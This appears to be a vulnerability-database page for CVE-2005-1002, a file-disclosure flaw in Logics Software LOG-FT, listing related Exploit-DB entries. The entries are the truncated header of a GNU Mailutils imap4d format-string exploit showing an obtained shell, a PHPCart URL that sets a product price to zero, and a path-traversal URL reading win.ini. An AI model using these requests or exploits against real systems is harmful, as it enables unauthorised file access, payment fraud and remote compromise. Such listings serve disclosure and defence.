CVE-2005-1002
Published 2005-05-02
Priority: P4 · 27 · medium · 5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 2.91% (85.2th percentile)
logwebftbs2000.exe in Logics Software File Transfer (LOG-FT) allows remote attackers to read arbitrary files via modified (1) VAR_FT_LANG and (2) VAR_FT_TMPL parameters.
No detection rules found.
Exploit-DB
GNU Mailutils imap4d 0.6 - 'Search' Remote Format String
exploitdb·2005-09-10
CVE-2005-2878 GNU Mailutils imap4d 0.6 - 'Search' Remote Format String
---
/*
* GNU Mailutils 0.6 imap4d 'search' format string exploit.
* Ref: www.idefense.com/application/poi/display?id=303&type=vulnerabilities
*
* This silly exploit uses hardcoded values taken from GNU/Debian testing (etch).
*
* $ ./imap4d_search_expl -h 127.0.0.1 -p 143 -u clem1 -s PROUT
* [+] GNU Mailutils 0.6 imap4d 'search' format string exploit.
* [+] By clem1.
* [+] connecting to: 127.0.0.1:143
* [+] authentification: completed.
* [+] format string: sended
* [+] shellcode sended.
* [+] Bingo.
*
* id;
* uid=1000(clem1) gid=1002(mail) groups=0(root)
*
* Copyright (C) 2005 Clement Lecigne - clem1 @ badcode.info.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struc
Exploit-DB
PHPCart - Input Validation
exploitdb·2005-04-27
CVE-2005-1398 PHPCart - Input Validation
---
source: https://www.securityfocus.com/bid/13406/info
PHPCart is prone to a remote input validation vulnerability. The issue exists because the software fails to sufficiently sanitize URI parameter data that is employed when computing product charges.
A remote attacker may exploit this issue to manipulate invoice and payment charges for a specific PHPCart order.
http://www.example.com/phpcart.php?action=add&id=1002&descr=Mobile%20Phone&price=0&postage=&quantity=100
Exploit-DB
Logics Software LOG-FT - Arbitrary File Disclosure
exploitdb·2005-04-05
CVE-2005-1002 Logics Software LOG-FT - Arbitrary File Disclosure
---
source: https://www.securityfocus.com/bid/12998/info
LOG-FT is reported prone to an arbitrary file disclosure vulnerability. This issue results from an access validation error and can allow a remote attacker to disclose sensitive data.
It is reported that an attacker can simply issue a specially crafted HTTP GET request to disclose sensitive files in the context of the affected Web server.
Information disclosed through this attack may expose sensitive data that may be used to carry out further attacks against a computer. It is not confirmed whether this issue may also allow an attacker to upload arbitrary files.
http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\&VAR_FT_TMPL=winnt/win.ini
http://www.example.com/l
No writeups or analysis indexed.